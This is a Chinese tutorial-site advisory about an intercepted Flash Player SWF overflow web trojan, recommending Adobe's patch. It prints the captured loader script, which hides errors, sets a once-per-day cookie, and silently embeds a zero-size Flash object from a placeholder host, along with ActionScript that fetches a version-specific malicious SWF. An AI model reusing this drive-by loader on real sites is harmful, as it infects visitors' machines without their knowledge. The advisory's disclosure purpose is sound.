首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
当前位置:查字典教程网 >实用技巧 >漏洞研究 >FLASH网马官方补丁
FLASH网马官方补丁
摘要:最近几天拦截到利用AdobeFlashPlayerSWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里...

最近几天拦截到利用AdobeFlashPlayerSWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容:

<script>

window.onerror=function(){returntrue;}

functioninit(){window.status=”";}window.onload=init;

if(document.cookie.indexOf(”play=”)==-1){

varexpires=newDate();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();

if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)

{

document.write('<objectclassid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″width=”0″height=”0″align=”middle”>');

document.write('<paramname=”allowScriptAccess”value=”sameDomain”/>');

document.write('<paramname=”movie”value=”http://www.XXX.cn/flash/XX.swf”/>');

document.write('<paramname=”quality”value=”high”/>');

document.write('<paramname=”bgcolor”value=”#ffffff”/>');

document.write('<embedsrc=”http://www.XXX.cn/flash/XX.swf”src=”http://www.XXX.cn/flash/XX.swf”/>');

document.write('</object>');

}else

{document.write(”<EMBEDsrc=http://www.XXX.cn/flash/XX.swfwidth=0height=0>”);}}

</script>以下为正常的FLASH文件使用的脚本:

//Actionscript…//[ActioninFrame1]

varflashVersion=/hxversion;

loadMovie(”http://www.XXX.cn/flash/”+flashVersion+“mal_swf.swf”,_root);

stop();

该恶意FLASH部分内容如下:

建议:

厂商补丁:Adobe

—–

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.adobe.com/go/getflash

【FLASH网马官方补丁】相关文章:

利用图片做木马应用完全解析

蜜罐技术:消除防火墙局限和脆弱

动网access版暴log库终极大法

网吧入侵之攻无不克!

由mysql弱口令取得system权限的实战

基于Webshell的sniffer可行性研究(图)

Internet Explorer6最新漏洞代码

研究UBB的跨站脚本攻击之综合篇

ASP木马后门新思路

2005年黑客聚焦:追踪垃圾邮件(图)

上一篇: Debian灾难性漏洞
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
实用技巧子分类
最新漏洞研究学习
热门漏洞研究学习